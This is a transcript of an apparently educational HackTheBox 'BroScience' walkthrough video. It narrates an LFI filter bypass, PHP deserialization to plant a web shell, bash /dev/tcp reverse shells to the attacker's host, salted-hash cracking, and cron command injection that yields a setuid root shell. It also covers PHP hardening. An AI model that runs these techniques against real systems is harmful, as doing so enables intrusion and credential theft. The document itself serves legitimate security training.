HackTheBox - BroScience

IppSec · Beginner ·🔐 Cybersecurity ·3y ago

Key Takeaways

The video demonstrates a cybersecurity attack on a web application using tools such as nmap, burp suite, and hashcat, exploiting vulnerabilities such as LFI, deserialization, and password cracking, and ultimately gaining access to the system as an administrator. Specific techniques include double URL encoding, static code analysis, and regular expressions to find vulnerabilities in crawled PHP files. The video also covers hardening the PHP web server by setting allow_url_fopen to off in the conf

Full Transcript

what's going on YouTube this is ipsec I'm doing bro science from hack the box which had a lot of Little Steps but most the steps had a small twist to it for example there's a lfi and the web application but there's a filter preventing a basic lfi payload but you can do a double URL encode to bypass the filter and include files by including files you can leak the web source so you can see how the activation of new accounts works so you can generate your own activation codes once you log into the app there's an unserialization vulnerability that is relatively straightforward then you get a shell on the box and you can dump the postgres database and you can't just crack the hashes right away because the actual web server prepends a salt to every password so once you figure that out you crack the password you log in and then there's a basic command injection and how it renews SSL certificates so with all that being said let's just jump in as always start off with an end map so Dash SC for default scripts SV enumerate versions okay I'll print all formats but in the nmap director and call it bro sign clients and then the IP address which is 10 10 11.195 this can take some time to run so I've already ran it looking at the results we have just three ports open the first one being SSH on Port 22 and its Banner tells us it's a Debian server we also have HTTP on Port 80. it's running Apache also tells us it's Debian and it's redirecting everything to httpsbroscience.htb so I'm going to go ahead and just add this into my host file so sudo via etsyhost then 10 10 11 195 and broscience.htb and finally the last uh thing nmap says is https 443 Debian we get the common name of broscience.hdb we also have a cookie PHP session ID so we know um it's probably going to be a PHP server so let's just go to 10 10 11 195 and watch it redirect us to this https site accept the risk and continue and it looks like it's looking up a CDN and we have what looks like a Blog so right away I'm pressing Ctrl U to see if I see any type of content management system I was thinking it would be WordPress but one thing that catches my eye is this includes image.php question mark path is equal to bench dot PNG we also see exercises dot PHP with an id1 so these two things I generally probably attack right away this one I test for SQL injection this one for path injection right so let's try this ID is equal to one and I'm going to intercept it send it over to burp Suite intercept is on refresh go to repeater tab I'm going to tape this SQL and if we do ID as equal to one we have let's see anything interesting here I'm just gonna look at the page bytes 4760. put a single quote we get uh 1600 we probably have to URL encode that still 1600. I'm going to put a double quote 1600 but nothing 1600. so I'm going to guess there's no SQL injection here we can also try it with like parentheses as well but everything keeps getting to 1600. so maybe SQL map this in the background and let it go if I was doing this um for the first time but the other thing we want to check is this URL so I'm going to refresh go to proxy send this one and this is going to be lfi right so the very first thing I do is I'm going to test like the PHP wrapper so we can do filter convert dot base64-in code resource is equal to bench.png and we get node base64 so I don't think that's going to work um let's see I'm going to try including itself right so if I do includes image.php see what we get we just get nothing um it could be going into like an image directory right so I don't know exactly where that image is going but it could go up one directory so I'm going to do dot dot slash and we get error attack detected so it didn't like something we did I'm going to get rid of index.php we just dot dot slash and we get error detected if I do dot dot we don't get anything so there's probably a bad string of this dot dot slash and one way to get around this is double URL encoding because if we just URL encoded this slash let's see right click convert where is convert convert selection URL encode all characters so if we encode this we still get attack detected because it's by doing one URL decode but a double URL indeed code is if we encode both the percent and the character so incur this here so now it's present to five percent two F so after one year low decode it becomes this and it will decode it again potentially and work right so we no longer get attack detected so now I'm going to try index.php and we get the file so this is a way to bypass the um the like web application firewall is just double URL encoding it and this works quite well right and just to show again if I press Ctrl Ctrl shift U you can see it's going to go to percent to f and then that right so this is percent okay so now that we have this we could take the lazy route right and just include files one at a time so I could probably include this and then get the file and we can try this password and stuff but um really what I would do in this case is take the opportunity to do a quick scripting Challenge and build a quick program that will crawl all the PHP files and extract them right because if I do that then I can use like a static code analyzer analyze the code find other vulnerabilities it's just so nice to do something like this so let's take probably the 10 to 15 minutes to build a program right so I'm going to open Visual Studio code because this is where I have like GitHub copilot and things like that so I'm going to call this um let's see if I just touch crawl dot pi is that going to open here let's just do code and I'm going to put Peoria to open this directory right yep trust it okay so the first thing we're going to need to do is import request okay and it looks like co-pilot wants me to create a function called crawl but we're not going to do that we're going to create this and then bro science.htb and the path was I think includes image.php path is equal to and then we do a double URL encode so 2 5 2f like that and then all I want to do first is make sure we can get a file right so I'm going to do index.php and we'll print our DOT text uh overwrite I guess and then launch this and all we want to do is see we get a file certificate verification failed so we need to do a verify is equal to false run it and we get this warning and we're also debugging here so let's just step over this and we have the page so there's two things I want to do real quick I want to get rid of this warning so I'm just going to import URL lib3 and we can do URL lib3.disable warnings like that is that it import it's underlined URL lib3 is not defined because I don't have two L's there we go so now if I run this I'm going to just set the breakpoint here we don't get that warning that we saw before and I can hit and go through so this is good now what we want to do is get a list of every um page right so if I look at this we need to make sure something begins let's see where's a PHP something starts with a quote and ends in dot PHP so I'm going to import art e for regular expressions and then we can do a um pages is equal to r e dot find all and then the regular expression and we want to say it begins with a quote like that and then we want to grab everything until um dot PHP so I'll do a to z A to Z 0 to 9. and then some special characters we do Dash underscore and slash because the slash is for directories and file names often will have dashes or underscores in them right so end that we say start a match all repeating characters of that and then dot PHP and we'll end the um match so now if I do four page and Pages print page let's see what happens here we should just get a list of things um as long as we did this correctly we need to just put our DOT text there so now we have a list of all the pages the issue with this is it's not recursive I'm guessing like maybe exercise.php had something here and like maybe another page was on this like we want to loop back over it right so what I'm going to do is create two lists the first one I'm going to start with index.php and I'm going to create one called scene and this is just going to be blank so every time I hit a new page I'm going to remove it out of the queue add it to scene and then redo this right so right here where my request.get I'm going to do while the length of Q is not equal to zero now we can do four page NQ and we'll do Q dot remove page and scene dot append page okay so now we are getting the request I don't know why this is saying error I guess this is sneak putting an error there that's fine um so here for every page we wanted say well we use the page variable twice I'm just going to change that to I so let's see pages is gonna be a list of pages so we'll say if I not in scene then Q dot append I okay and down here we'll say 4 i n scene print I so we should get more than these right so run this again and it's thinking about it hopefully we didn't create like an infinite Loop here that's going to be the danger of doing this while Q is not zero so we remove it nope this looks good uh we got the page multiple times that's not the greatest thing um I'm guessing like even on index like it linked to exercise twice and I'm guessing that is why let's see if I do and I not in q is that going to speed this up run it let's see I want to say I'm missing some I think we went from too many to too little let's see well I know I'm missing one um because I know exercise.php has something if I go back to here if we do broscience.htb exercise there's this and I think that's going to be comment.php so we did not get this I don't know exactly y or script did not get that do we get it here let's see copy this the output paste comment we did not so what is going us up from getting the comment we definitely hit exercise.php so let's see we'll say if page is equal to exercise.php rint r dot text I'm also going to set a breakpoint here to make sure we actually get this and we do so if I go into debug I can do pages and I don't see a comment I do r dot text let's see if comment in r.txt print test so there is no comment here oh God that's embarrassing I never put page here there we go now this can be fixed every time we were getting index.php I think there we go so now we have a list of pages we can get rid of this if page is equal to exercise.php and the only thing we want to do is get rid of a slash gear so I'm going to say let's see for ION pages down here we can say if I zero is equal to slash Trim It Off okay so now when I rerun this the comment.php should be um there awesome so now we have a list of all the pages what we want to do is save them to a file so I'm going to create a function here we'll do def save file and we'll do fname and F contents and let's see we want to create the directories if they don't exist so I'm going to say if slash n f name and here we're going to import another Library so I'm going to do from pathlib import path and what this is going to allow me to do is just create the directory so we have a slash we know there's a directory we're going to say f directory is equal to path fname and then path after dot parents zero and this is just going to get me the directory so dot make their parents is equal to true and exist OK is equal to true so if you want to know what that path after thing does we can show real quick python3 import and we'll say p is equal to path um tap d-i-r ipsec.php let's just say that was it right I can do p dot parents and we just get that if I do zero we'll get temp directory we do one we just get the top level to we want zero I don't know what one everything was giving me but this is what we want because we just want the directories uh parents is going to be like make their Dash p it'll create the Parent Directory if it doesn't exist and exist okay if we didn't have this or script would error if the directory already existed so now that we know the directory exists we can say with open fname right and then F contents so here right after request.get we can save file and then page and our DOT content so if I ran this again it will probably create all those PSP files for us the only thing I want to do is make directory called source move crawl to source because we're not writing it in a directory so just do it this way and hopefully we'll have everything here we do sweet so we move crawl up One Directory and now I have the PHP application Source if I look at index.php we can see it so now I'm going to run Visual Studio code yet again I'm going to show off an extension called sneak so I already have this installed and it's analyzing the code and we found a bunch of vulnerabilities already so if I go to utils we have unsanitized input from cookie flows into unserialize and it's showing right there so there's a cookie get theme and if is set session ID then unserialize so we need to figure out where this get theme is called but we can keep going through the code to see if there's anything else this is just telling us it's missing cookies and man my like font size is really screwing up this so um set cookies not too interesting we got another high here this is telling us the directory traversal so sneak did discover that user.php let's see what is this saying flows into Echo statement this is a cross-site scripting so because we're just getting the ID and not doing any filter um you can probably do cross-site scripting there you can click the other thing go about like using md5 but really really cool plugin for visual studio code and completely free so this makes doing these type of challenges easy when you go into source code analysis because we start with this unserialize so let's see exactly where this is called it's in the function get theme and I can just do file find in files get theme and we can see it's in multiple places so right off the start um get theme and we could exploit this right away but there's one other thing that's intended that I don't think is needed um we'll validate if it's needed or not beforehand but um there is a authentication bypass so if we didn't have that source and we tried to log in with like admin admin we get incorrect if we create the account let's do ipsec root at hipsec dot rocks we'll do your password of password we go to register it says account created please check your email for activation link and we don't have access to email but if we look at this let's see I'm just going to search my code for activation we can see in register there's a generate activation code and I'm going to get rid of this panel there we go and we see it's just doing um srand on time and the activation code gets just set by time so this is an insecure use of srand because we can put any time we want here and generate a activation code right so I'm just going to copy this function V activate.php and we can do a print here like this Let's see we don't need that and I just want to do Echo and if I run this we can see every second I get a new code if I do it twice really quick we get the same code because it's still the same second right so I screwed up and was not intercepting when I created this so let's intercept another one I'll do ipsec two root 2 at ipsec dot rocks we'll do a password password and I want to intercept this let's see where's burp sweet here it is proxy register I'm going to intercept the response to this request so when I send this the header tells us what time it is so we can copy this go back to our activate.php and where it has time here we can do a PHP function str2 time I believe and then just paste this timestamp in and every time we run this it's going to be the same and this is going to be the activation code right so let's go back to a browser account created check email for activation link um it's probably like activate.php right missing activation code we probably have the source don't we I guess we did not grab the source because we never sent the post to create an account um I bet it's code question mark code is equal to this awesome account activated so now we could log into Bro Science so we can do ipsec2 password of password we get logged in and here's where we could change the theme right so if I look at this request intercept now I have a cookie um user pref right and this is this realized object but we didn't have to be logged in I think let's see Echo dash n these are equals base64-d yeah this is just the serialized object so once we get it working I'm going to log out and we'll see if we can just paste the cookie in to do it without this step because I'm pretty sure you can skip the step but when it comes to deserialization there's going to be two functions that are very common it's either I want to say it's either destruct or destroy I forget what the word is let's see there's a session destroy there's a destruct I don't see it the other one is probably going to be wake up and we have one public function wake up and that's in this Avatar interface and this is important because when the wake up means when this gets initialized it's going to do this function right so when we do an unsearily is we're going to create this and it gets initialized and was saving a file here so we can write files and this let's see it's creating a new Avatar and Avatar is here so we want to copy this I'll just call this uncli.php we'll paste it in like that and if you're confused I would highly recommend going to ipsec.rocks and then they're searching for like intro PHP deserialization and going to this video because I spend probably 20 minutes here explaining exactly what this is actually 30 minutes so definitely check that video out so let's get back to the code and now we just want to initialize this object so we can do serialize new Avatar interface like this and let's see we can change these variables to whatever we want so if we just ran this now if we do PHP unserialize we need to put a print so Echo payload it's just going to um say there's variables aren't initialized right so there's two we want we want image path this is going to be um where it's stored right so it does new Avatar this image path and let's see we can see image path is being used here to write and temp is being used with the file git contents to download something so on image path we want to set this to be I'll call it ipsec.php and then temp we want to set this to be our file right and we can get this off a web server so 1010 14 8 000 and we'll call it ipsec.php so now when I print this we have our object here so I'm going to make the dub dub dub go in here the ipsec.php we'll do system and then request CMD and we'll end that so python3 Dash M HTTP server and we can copy this go to burp Suite and then we just need to base64 encode this right convert selection base64 and code so our web server is up run it and we see it got ipsec dot PHP so on the server let's turn uh burp Suite off real quick let's do ipsec.php we see it's not giving us a 404. if I intercept this go back to proxy we can put anything we want here so I'm going to change this to a post request so change request method and here CMD is equal to LS internal server error what did I call the parameter uh request oh I did not close this there we go let us re-download hit this again and now we have code execution so we did want to make sure we could do this without being logged in I'm curious because the code if we did read this correctly right if we go to where was it utils theme it just says if session is set ID and we know it is going to be user pref cookie because it's doing that here so let us log out so is there a log out that's going to be the question there is so now we logged out I'm going to intercept the request so refresh so this is a logged out user and I just copy this and we'll see if it works it does not actually so we needed to log in why do we need to log in is set user prefs I guess we don't get an ID if we're not set yet so I was thinking this line in my head just meant um if this PHP session ID is created but if we look it's looking if the ID parameter of that session exists so this is making like essentially if the user is logged in so you can't exploit this unserialize without logging in Prior what's going on this is it from the future and while the unserialized vulnerability is critical I can see many people missing a second thing that I would try to write up in any report and that is the PHP web server itself was not hardened in specific there is this configuration file this allow URL F open which will prevent the PHP thing from uh becoming URL aware so it wouldn't be able to include things off of remote sources because file git contents include or F open all won't allow URLs and then probably 99 of cases this is probably going to be the case not many times you need to include something you can still do the exploit on this box and we'll show that but what's important here is if this setting was set then the first attempt would fail they may never ever get remote code execution but most importantly you get something in your logs that says something bad has happened and give you time to react before they get a shell on your server it's all about um increasing the time or effort it is to attack so let's take a look at this I have a shell in the box I'm going to do fine slash Etsy name PHP dot ini to find the PHP configuration file and we have the Apache 2. this one is the command line if I just do like PHP Dash I to get interactive or run a script that's a config file for that but we want to modify Apaches right so let's VI this file and look for allow urlf open and we're going to set it to off or um yeah off because we don't want to allow it so we'll change it from on to off and then do a system CTL restart Apache 2. and this is probably going to take a minute or two to restart so I'm going to pause the video I'm not sure why it takes so long but it does okay Apache has been restarted I'm going to look at my web server where we're listening and we're going to resend the payload and I've already like got a valid session so this session is logged in and this cookie if we look at it is oh it's actually not the payload we want to send this cookie right we can see the unserialized is getting it off of a web server so I'm going to put this cookie in we're going to send it and if I look back at my python web server we have nothing so let's go over log apache2 if we tail error log we see um undefined property uh fail to open stream so this is it no suitable wrapper can be found in this file gate contents we can do a table Dash F on this Apache log again so we can show it so send it and we get all these errors of allow urlf open to zero and we can no longer proceed which you think the vulnerability is done at this point because we can no longer get a file off the web server however there is a second way we can get files or not get files but we can part files on the server um we have this PHP session right so I'm going to go back to the activate so let's go into our code let's see or not activate we want to get into our exploit script so unsealize so right now all we're doing is including it off the remote source we could view the cookie the cookies generally going to be in um I think ver lib PHP sessions and then sash underscore the cookie name so let's try to grab our cookie here and we'll paste it and then I'm going to call this ipsec dot s-e-s for session right so when I write this unserialize and I should just have the PHP base64 encode it but oh well we'll do this and then convert selection base64 encode okay so when we send this now we should have moved our cookie over to ipsec.sec or SEC right turn proxy off and we can see what a cookie looks like we have a username here well if our username when we register an account allows us to put anything we want here we could potentially have this be poisoned right we can put a PHP code here so that's what I'm going to try to do real quick so let's go to broscience.hdb we'll log out so we can register a new account and we're going to do the username PHP and then system r e quest CMD like this so this is essentially what a file was right so let's do email of root at ipsec dot rocks password of password again and we want to intercept this request so I'm going to prep Suite intercept register I'm just going to put in a repeater tab so we can easily grab it grab this time it says an account already exists oh with this email we'll do root 3. account created please check email for Activation and we want to grab this time stamp to go to our activate and change the timestamp to be the new one and then we can just copy and activate our account so bro science htb activate dot PHP code is equal to this a good rip Suite intercept off account activated so we have activator account now we can go to login and we want to log in with this weird username we created let's unroll encode this copy log in paste a password and we're now logged in with this user which is weird but okay go back to proxy let's get a new cookie so we have this session so let's go back to the unsealized exploit we'll put this session here and we'll call this Please Subscribe dot PHP okay so PHP unserialize I'm just going to base64-w0 copy this we'll paste this into we'll get back here I guess paste this cookie in and before we hit I'm just going to test Please Subscribe dot PHP not found send the request and we have please subscribe.php now if I do CMD is equal to LS here we can see we have now successfully exploited the server so again um all the defenses isn't about stopping everything right as long as you stop something chances are you'll be able to create a log and have some time to fix something right and probably nine times out of ten the attack will completely miss this vulnerability because it stopped them initially and they won't keep going down the rabbit hole of how do I exploit this right because this whole session poisoning thing is something that I probably wouldn't think about right away so this gives you the time you see your application got exploited you can go in the logs um find the vulnerability patch it hopefully before the attackers get on or maybe um they got on and you don't know because you didn't have any logs because you never stop them at any point right so with that being said let's continue on in the video and see what happens after the Shelf with the ability to execute commands the next logical thing is to get a reverse shell so do bash Dash C then bash Dash I Dev TCP 10 10 14 8.9001 zero and one like this and we'll URL encode everything and then we want to listen on Port 9001 send this and we have a shell so let's do python3-c import PTY PTY spawn Ben Bash okay then sdty raw minus Echo FG hit enter twice and we can export term is equal to X term and now with our shells since this page did not come back I'm just going to make a random request to the server and make sure I did not hang the whole web server because sometimes when you do these type of reverse shells you can do that generally if it's running through Apache or nginx you won't if it was like um just a python server or something like that um you do have a chance to hang it since it's not threaded but with a shell we can dump the database it is and includes then DB connect.php but before we had already extracted all the source code so I'm just going to grab it from here so if I look this is going to be postgres because we see it's Port 5432 also it's using PG connect which is postgres whereas my SQL would be a 3306 so I'm going to do psql dash dash help to get the help information for this and we want let's see Dash capital u which was DB user then Dash W for password weird okay and it's range of motion percent 777. and P authentication failed I wonder if I've specify Dash H for hostname and we'll do localhost uh database DB user does not exist so I'm going to now end this with Bro Science to connect to the Bro Science database and we're logged into postgres so the first thing I'm going to do is a du and I think I want plus so I can just do d u and I want to see what my role for DB user was if it was super user we could just execute commands right off the bat but it's not so let's do slash DT to list all the tables of Bro Science and if you go to ipsec.rockson type postgres I'm sure there's going to be a quick 101 for you but um let's see we have comments exercises and users we wanted to dump the users so I'm going to do slash D and then users and we can list all the columns here we have ID username password email activation code is admin I'm going to do uh let's do username password email so select star from uh users let's not do that username password email and I type in that there we go it's the administrator Bill Michael John Dimitri so I'm gonna get rid of email and we'll just copy this so copy then V users dot text paste it and let's get rid of all spaces and then change the pipe to be a colon that looks good so if I can't use the dot text this is probably going to be an md5 some right let's um Echo Dash and wc-c helps if I paste 32 characters so that is most likely md5 so let's copy all of this go into the Kraken we'll have hash cat and then I'm going to go CD hash cat then V hashes I'm going to call this one bro science paste this in dot slash hashcat um let's see I'm gonna figure out the modes right I think it's mode zero for md5 zero is md5 looking right there I'm not doing Auto detection here because it could be well I'll show you so we can do this then hashes bro science opt wordlist rockyou.txt and it's thinking about it uh no oh we have to do dash dash user as well because we have the usernames then colon the hash and we see all the things that it could potentially conflict with so we want Dash mode zero and try to crack this we get nothing so we should validate that it is indeed md5 because it could be any one it could be like md4 hashes which is like ntlm um the main difference between ntlm and md4 I think is ntlm is utf-16 little endian and md4 could be just whatever but I could be wrong with that so let's take a look at exactly how we log in I'm going to guess logging in is in login.php right so here we're checking if username and password is set um DB connect so here we connect to the database we're doing a prepare and we'll use name and password is to and here we have the password is equal to md5 the DB salt and then it can cats the password so it's putting the salt before the password so if we go back to dbconnect we can see the salt is NaCl which is um I think sodium chloride which is salt right so let's take a look at this um how do we do this I think it's hashcat and we can do Dash to H for help and then let's do we could easily create a rule or we can do a combinator so I'm gonna do the same thing then we need Dash m0 then Dash a for Attack Mode one and then I'm going to do this and what this is going to do is make a fake file and have NaCl be the only contents and then we're gonna do opt word list rocky.txt and I just realized I gave it three word lists because we have opt wordless rock you dot text here there we go and it does not like using this weird redirector so we'll call this salt and put n a c l there like this and that should a prepanned NACL to everything in Rocky uh hopefully maybe it did not see NaCl yeah we can see what candidates there are and that is doing the right thing oddly enough it's only using One graphics card when I do it this way I guess because one word list is too small but it's still not cracking anything let's see n a oh lowercase C the salt and ACL like that and run it again and hopefully this time we get better results so n a c l and ACL so we're just gonna let this one run and hopefully we get a password there we go we have one password already so it is going to be oh there's two so I love horses and gym Aaron the best two apples plus two apples um so it looks like we have a few credentials now so I can just do dash dash show let's see uh dash dash show Dash m0 and we see Bill's password is the I love horses and Jim Michael is Apples to Apples I guess this is Dimitri Maybe I'm Wrong there but that's Aaron is the hottest so let's go back to our show and let's see the HTML is empty okay I guess there's a cron replacing the whole HTML directory and the directory has a different inode when it gets replaced by the KRON which means where I was previously no longer exists technically so um let's cat Etsy pass WD Grant Bash and we see there is a user called bill so I'm going to try Su bill and we're going to use Bill's password so copy this paste it in make sure we have the correct password NaCl I love horses and Gem that looks correct we can try the other passwords as well so copy this one and then we'll copy Aaron the hottest as well just in case but it's definitely got to be this right and ACO it's probably just I love horses in gym right because remember this is the um salt right the user did not type that as part of his password so we can use his correct password which is just I love horses in gym and log in so we can do pseudo-l and see if this guy has any pseudo rules and it looks like it is probably trying to do a DNS lookup and just taking a while uh Bill may not run sudo on bro science so we can see what's in Bill's directory we do have an SSH so I could now switch over to um SSH if we wanted to there is users.tax it looks like the GUI is installed we have documents music public whatever which is not normal there's this weird search directory and if I look at certs it is completely empty so if we do aps-e-f- Forest um let's see my TTY doesn't have like the rows correctly I think let's just switch over to SSH so cd.ssh or we can probably um just SSH with his password right we don't even need to drop a public key so sh bill broscience.htb except the fingerprint paste in the password and we have better shell so now if I do PS Dash ef- Forest we can see everything okay I don't see anything too interesting so the main thing I'm curious is what this search directory is used for um we can run like piece by and see if anything hits so I'm going to github.com or we can just search GitHub piece bye and get this program I should just have this saved somewhere right let's just download piece by 64. save it and then CD dub dub dub move downloads piece by 64. then python 3-macp server and we can W get it so I'm just going to go into music wget 10 10 14 8 8 000 piece by 64. chmod plus X to make it executable and run it and let's see if any process ends up um getting hit right so we see cron starting it is the top of the minute and it doesn't look oh there we go we had a lot so we have it running session clean so this is probably going to clean some PHP sessions what else is it doing session clean looks like this is all stuff to clean the session still looking at sessions let's wait until the next minute to see if it does anything different and here we go we do have something so it tried to reset the web app and then now it is running this optrenew certs.sh on home Bill search broscience dot cert so I'm going to look at this so we can cap this file and see exactly what it does let's see two of them sweet we do so it has syntax highlighting so it's going to do let's see one is the first argument so this is going to be broscience.sert so x509 in this no out check so I think we just need to give it a certificate and it will renew it right in country so it's extracting things from the is it extracting or grabbing yeah it's extracting it so it gets the subject from the search and then does all these Echo statements grabbing each of those variables country okay that generates the certificate and inputs all the information we can see it uses this thing and then it executes bash to move it and puts the common name dot cert here so how is common name pictured because we have traditional command ejection right here right it's just doing bash.c and then the command so I'm going to look where common name is common name common name it's getting it from the certificate so it looks like we can create broscience.sert put it in there and have the certificate change the name of it and with the name we can put a malicious name to execute commands right so let's see um I'm gonna just grab this line copy it and let's see we can go into certs and it was bro science.cert I think it was let's see go up this is what we want there's that we can copy everything let's see request we just copy this I wonder if we should say broscience.key and broscience.sert that would make more sense so let's do row science and then broscience.crt okay and then when it asks us for the common name that's where we can put something right so here so if I do um I Dev TCP 10 10 14 8 9001 zero and one this should execute I'm not doing the bash C because in the actual command it's already running bash for me right so I know I'm gonna be in Bash so you run this okay so if I look at opt then renew cert.sh we can take the command it uses to get the subject so if we grab this and then we'll just put in bro science.cert we can see everything it grabs right so common name let's see if I do subject is equal to this is this how it did it Echo subject sweet so I can now just run each of these manually so if I do common name like this Echo common name that is the CN right and that's what it's going to put in for this file so all we have to do is wait for this to execute again I think it's executing every two minutes so we probably have um 30 seconds right date yeah so I can start piece by and we'll be able to see the actual event there we go it should have ran but we never got a shell we did after new cert broscience.crt but it doesn't look like it liked our Command so let's go back to certs it's no longer there let's see bye cat opt renew certs I'm going to simplify my payload so let us go back to this open SSL command let's see history do we have it we do so I just want to run this 14. so exclamation 14 will run the command number 14. and a u some State uh Gotham I'm just going to put make sure something's in everything uh Batman I guess okay common name so I'm going to put a semicolon uh we'll put a file name actually so we'll do one and then semicolon and we can say CP then bash to temp then chmod 4755 Ben bash so this is going to set the uid and then we'll do another semicolon Echo one email address root ipsec.rocks okay so what we did here is now we go to opt reducer.sh and we make it opt we'll do temp test dot sh see temp test.sh so what we did is now this is going to be multiple commands so if I remove common name dot cert it's going to um just put that there so it's a valid command and then semicolon CP then bash to temp and then it's going to chmod to make it sticky and then just Echo one.cert so this should be I guess a bit better for the command execution because there's no special characters whatsoever so I'm going to run piece by again so dot dot music piece by 64. and I'm gonna wait probably another 45 seconds we should be seeing the cron there it is and we have it renewing it's going to broscience.sert and did it not work LS temp lsla slash temp I don't think it did test.sh was us it wrote temp dot key actually no we did I don't have been bash there what are we doing wrong let's look at this and we start here so we get the certificate it's gonna be bro science.cert oh I wonder if our days if we just need to do days one let's let's try that real quick so let's go back to certs and let's make sure Ben bash existed it did LS tap Ash definitely does not exist so let's go back to our x509 or open SSL command and let's see do we have Dash days it's the very end we'll do one and then all this organizational unit okay then CP I'm just going to grab it from my last one where is it here it is copy paste email so we have bro science.cert okay let's see subject let's grab this and we'll do 20 after wait what does not exist they already run that was weird days one that's not what I want let's just try it this way CP Ben bash to Temp Bash mod four seven five five temp Bash okay and we probably have 45 seconds so we got bro science.cert broscience.key subject that's uh we can probably just Echo subject this is what our common name is so that definitely should work unless something is cleaning up temp right after but I probably would have seen it in piece by let's remove temp.key just in case maybe that's it I can move test.sh as well they piece by and see if we get it because we should have something starting in about three seconds I would think so three two there we go let's see move so it's definitely did it and I think the issue is it actually put it in quotes so maybe that's what broke my um thing but we definitely have it now running the CP command so if I go to tab lsla bash it is here and we do have it as set uid we can see the S here we can do bash Dash I and then do ID is it past SP actually ID and now we're effective uid is root so if I go to slash root we can now read root.txt and that will be the box so hopefully you guys enjoyed it I'm not 100 sure why it took me multiple times I was obviously doing something wrong there um now that we had it once I want to check something so let's see if we can do a reverse shell because that was weird that didn't work I was really expecting it to work first time but that could have been a typo right so let us not subject open SSL okay do all of this section then bash Dash I Dev TCP 10 10 14 8 9001 zero and one like this okay so we have a Bro Science cert let's do date we have another 20 seconds left so let's go music piece by and we'll be able to Snoop in on what it's doing I don't know why it just aired there that was odd um looks like we still have time so and probably three two one there we go and we have a reverse shell so I probably just made a typo when I did it the first time or something but here we go we have it if it doesn't work for you maybe try it again another thing that could happen but maybe there's like a race condition of if you do it just before the minute and you're typing the reverse shell as it generates maybe um the file goes away immediately that doesn't exactly make sense but now that I'm explaining it maybe it does let's see when does it create the file remember I talked about like in that whole um whereas in www.html and the directory didn't exist I talked about an inode um this could be something similar so let's see what is the user bill at broscience.htb let's put the password in and we're going to go to the search directory and let's go here and what we want to do is back this openssl command so we created the key not the certificate and this is when we create the cert so let's see rm-rf stir up date so let's see if I do date again we have 20 seconds so I'm going to guess what happened is it did something like this we're going to I guess we can just wait 15 seconds real quick so I'm curious if it's replacing this entire search directory or um just the files right so the command should have ran now right so if I finish this and we do it LS we have broscience.cert maybe I just wasn't patient enough I don't know it deleted the key but I don't think that was it I'm not exactly sure why I'm sure when we go back in the video and Rewind it's going to be me making a typo but and I went back and I discovered exactly what happened we changed multiple things when we're doing the um box so if we look at our Command um let's see I can get rid of the damn shm uh what we have is the dash days right and when we looked at Opera new cert let's just do it in Vim opt renew cert dot sh if we look here we have this check end parameter and this is actually in seconds not days so when I was originally looking at it I just glanced over it and most things are in days so I kind of ignored it but if we googled open SSL check end and we go to the page let's see check end we see um within the next seconds so check end is going to be seconds so this is what worked when we did uh changed or shell to days one but I try to be tricky when I change it to days one and originally had done this print uh like CP bin bash thing right we did this parameter boy looked at it in piece by it put quotes around it and I think that's what ended up um breaking it we changed multiple things I bet if I did it well I know if I did it like this and put it in the dollar parentheses bracket it would have magically worked right so whenever you change something try to only change one thing because when you start changing multiple things you don't know which one fixed it and it was actually the days one that fixed it um not making the payload simpler so uh yeah I hope that helps take care and I will see you all next time

Original Description

00:00 - Intro 00:51 - Start of nmap 02:30 - Finding some vulnerable-looking parameters 03:50 - Testing some basic things for LFI, finding a WAF blocking ../. Double encoding it to get passed 07:11 - Start of writing a script to abuse this LFI and crawl/download all the php source 10:30 - Making the script recursive, so it will check pages downloaded for new links 16:50 - Making the script save the files 19:40 - Opening the code in Visual Studio Code, and showing off Snyk's static code anlysis to highlight a Unserialization vuln 22:20 - Identifying how the site generates activation codes upon registration identifying an insecure use of SRAND(). Generating our own activation code 25:30 - Exploiting the PHP Unserialization by finding a vulnerable gadget (wakeup) which will save a file 27:45 - Building a deserialization object to download a file off our server and write it to the web directory 32:08 - EDIT: Talking about webserver hardening (allow_url_fopen in php) and how it would slow down this attack 35:00 - EDIT: Poisoning our PHP Session with PHP Code as our username, then building an object to copy that to the server so don't need to use a remote host 41:38 - Getting a shell on the box, dumping credentials from postgres 44:55 - Attempting to crack the passwords, failing, checking the source code to identify there is a hidden salt. Then cracking the passwords 51:25 - Passwords cracked logging in as bill 55:10 - Using pspy to identify a script runs to renew certificates 57:15 - Going over the bash script and identifying a command injection vulnerability. 1:01:45 - Failing for a bit because I didn't change the certificate time, then changed too much at once which caused me more problems 1:06:04 - Finding the CheckEnd parameter, setting our days equal to one but our payload doesn't work 1:08:15 - Putting the payload in $(), and getting root to the box 01:10:20 - Just making sure we fully understood why our first attempts failed
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
